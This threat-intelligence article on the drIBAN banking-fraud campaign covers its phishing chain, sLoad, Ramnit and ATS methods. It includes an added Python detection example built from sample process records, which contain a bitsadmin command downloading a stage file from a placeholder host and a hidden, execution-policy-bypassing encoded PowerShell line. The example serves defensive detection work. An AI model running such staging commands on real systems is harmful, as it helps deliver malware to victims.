A financial fraud campaign targeting Italian corporate banking customers, active since at least 2019, has been identified. The campaign uses a new web-inject toolkit called drIBAN, capable of altering beneficiary account details during financial transactions, which lets the fraudsters divert the transferred funds into accounts they control.

A deeper look into the fraud campaign

Cleafy researchers reported that the campaign started targeting Italian corporate banks in 2019 and paused in 2020. In 2021, a new wave was observed hitting thousands of victims, and it is believed to still be ongoing.
  • Over the course of four years, the operators have gradually refined their tactics in several respects, including more convincing social engineering and maintaining a foothold in the targeted network for longer while avoiding detection.
  • The attackers often use the Automated Transfer System (ATS) technique to bypass the anti-fraud controls used by banks, such as multi-factor authentication (MFA) and Strong Customer Authentication (SCA).
  • The drIBAN fraud operations target Windows workstations in the banks, attempting to replace legitimate beneficiary bank details with those of accounts controlled by the attackers or their affiliates.

The attack chain

The attack begins with a certified email, or PEC (a special type of email used in Italy as the legal equivalent of registered mail), chosen to make the lure look legitimate to potential victims.
  • These phishing emails carry an executable file designed to download sLoad, a PowerShell-based reconnaissance tool, onto the infected computer.
  • sLoad collects system information and exfiltrates it so the operators can assess the infected machine. It leverages living-off-the-land (LotL) techniques that abuse legitimate tools such as BITSAdmin and PowerShell.
  • If the target is judged profitable, the Ramnit banking trojan is dropped as the next-stage payload.
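The BITSAdmin and PowerShell living-off-the-land behaviour attributed to sLoad above leaves traces in ordinary process-creation telemetry. The following is an added example, not code from Cleafy or Cyware: it applies a few detection rules to constructed Sysmon-style records, and every path, URL and encoded string in it is a placeholder rather than an indicator from the campaign.

```python
# Added example (not from Cleafy or Cyware): flag the BITSAdmin/PowerShell LotL pattern.
# Constructed records shaped like Sysmon Event ID 1 fields; the paths, URL and
# base64 string are placeholders, not indicators from the campaign.
SAMPLE_EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "bitsadmin /transfer job1 /download /priority normal "
                    r"http://example.invalid/stage.bin C:\Users\Public\stage.bin"},
    {"id": 2, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "bitsadmin /list /allusers"},
    {"id": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell -w hidden -ep bypass -enc QQBCAEMA"},
    {"id": 4, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell Get-Date"},
]

# BITSAdmin switches that create or feed a transfer job (documented switches).
BITS_JOB_SWITCHES = {"/transfer", "/create", "/addfile", "/resume", "/setnotifycmdline"}

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def analyse(event):
    """Return the list of rule hits for one process-creation record."""
    reasons = []
    image, parent = _basename(event["Image"]), _basename(event["ParentImage"])
    args = event["CommandLine"].lower().split()  # whitespace split suffices here
    if image == "bitsadmin.exe":
        if BITS_JOB_SWITCHES & set(args):
            reasons.append("bitsadmin job switch used to stage content")
        if any(a.startswith(("http://", "https://")) for a in args):
            reasons.append("bitsadmin given a remote URL")
        if parent == "powershell.exe":
            reasons.append("bitsadmin spawned by PowerShell")
    elif image == "powershell.exe":
        if {"-enc", "-encodedcommand"} & set(args):
            reasons.append("encoded PowerShell command")
        if "hidden" in args and {"-w", "-windowstyle"} & set(args):
            reasons.append("PowerShell hidden window")
        if "bypass" in args and {"-ep", "-executionpolicy"} & set(args):
            reasons.append("PowerShell execution policy bypass")
    return reasons

def flag_suspicious(events):
    """Map event id -> rule hits for every record that trips at least one rule."""
    return {ev["id"]: hits for ev in events if (hits := analyse(ev))}
```

Records 1 and 3 trip several rules each, while the administrative `bitsadmin /list` and the plain `Get-Date` invocation pass, which is the behavioural (rather than signature-based) distinction the ending notes call for.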

Ending notes

Operators of the drIBAN campaign are using ATS and LotL techniques, making them almost invisible to traditional signature-based security systems. Moreover, given their slow-and-steady approach to refining tactics, the toolkit could soon turn into a nightmare for security agencies. To stay protected, organizations are advised to keep abreast of the evolving threat and to continuously strengthen their security posture.
Cyware Publisher